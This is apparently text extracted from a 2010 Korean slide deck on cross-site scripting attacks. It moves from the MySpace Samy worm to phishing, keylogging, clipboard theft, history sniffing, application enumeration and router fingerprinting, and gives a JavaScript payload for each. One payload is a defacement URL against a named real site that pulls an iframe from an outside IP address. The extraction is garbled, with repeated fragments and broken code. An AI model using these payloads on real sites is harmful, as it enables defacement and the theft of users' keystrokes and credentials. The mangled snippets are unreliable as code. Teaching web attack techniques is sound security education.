XSS s XSS, s, May 25, 2010
XSS s 1 2 s 3
XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록.
s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여 공격. 상호 보완하여 완벽한 공격이 가능.
XSS s 웹페이지 인자값을 통해 내용을 조작. 특정 컨텐츠를 삽입하여 유도.
XSS s /error.php?message=we are very sorry...<a href=... >OtherApp.com</a> to continue...
XSS s http://www.daekum.com/order/szsearch.php3 Firefox http://www.daekum.com/order/szsearch.php3?mode= search1&search=</font><script>eval(location.hash. substr(1))</script>#document.body.bgcolor= black ;document.write( <iframeheight=2000src="http: //166.104.245.142/wah/deface1.html"onload= "resizeframe(this)"frameborder=0></iframe> );
XSS s 수행방법은 위와 동일. 사용자의 개인정보 입력을 유도하여 정보를 수집. 로그인 정보를 입력하도록 유도. 금융 정보를 입력하도록 유도.
XSS s
XSS s 피해자가 특정 행동을 유발하도록 함. 해당 행동을 피해자가 한 것이 되므로 공격자의 흔적이 남지 않음.
XSS s 피해자의 자동완성 정보 수집. 자동완성이 켜져있는 경우, autocomplete 캐시에 값이 저장되어 있음. autocomplete 캐시의 값을 공격자 pc로 전송. 공격자의 도메인명을 신뢰된 사이트 영역에 추가하도록 요구.
Log Keystrokes XSS s 피해자 브라우저에서 키입력을 수집. <script> document.onkeypress = function (); { window.status + = String.fromCharCode ( window.event.keycode ) ; } < /script> 키 이벤트 발생시마다 실행됨.
Capture Clipboard Contents XSS s 피해자 브라우저의 클립보드 내용을 가져옴. explorer 6에서 작동하는 코드. <script> alert(window.clipboarddata.getdata( Text )); < /script>
Steal History and Search Queries XSS s 사용자가 링크를 클릭하면 해당링크가 색이 바뀌어 표시됨. 브라우저에서 색상을 변경하므로 html상에서는 확인안됨. 자바스크립트의 getcomputedstyle API 를 사용하여 색상정보를 얻어냄. Brute-Force 방식으로 색이 바뀐 링크를 검색.
XSS s firefox 3.6, chrome 5.0에서 작동. explorer 6에서는 작동안됨. < a id = ref1 href = http : //www.wah.com > test < /a > < script > ref = document.getelementbyid( ref 1 ); refcolor = document.defaultv iew.getcomputedstyle(ref, ).getp ropertyv alue( color ); document.write(ref color); < /script >
Enumerate Currently Used Applications XSS s 로그인 상태가 아닐때 에러페이지를 반환하는 주소를 접근. 회원정보 페이지 등. 해당 페이지가 에러페이지나 로그인페이지가 아니면 로그인상태. 브라우저 동일출처 정책 때문에 아래의 코드를 사용함. window.onerror = fingerprint; <script src= https://other-app.com/mydetails.aspx > </script>
Port Scan the Local Network XSS s 브라우저 기반의 포트 스캔. 자바스크립트로 포트 스캔.
Other Network Hosts XSS 네트워크 호스트의 정보 파악. s 라우터가 netgear 제품인지 확인하는 스크립트 <img src= http://192.168.1.1/hm icon.gif onerror= notnetgear() >
Exploit Browser Vulnerabilities XSS s 브라우저 버그 플러그인 버그 ActiveX Firefox Add-on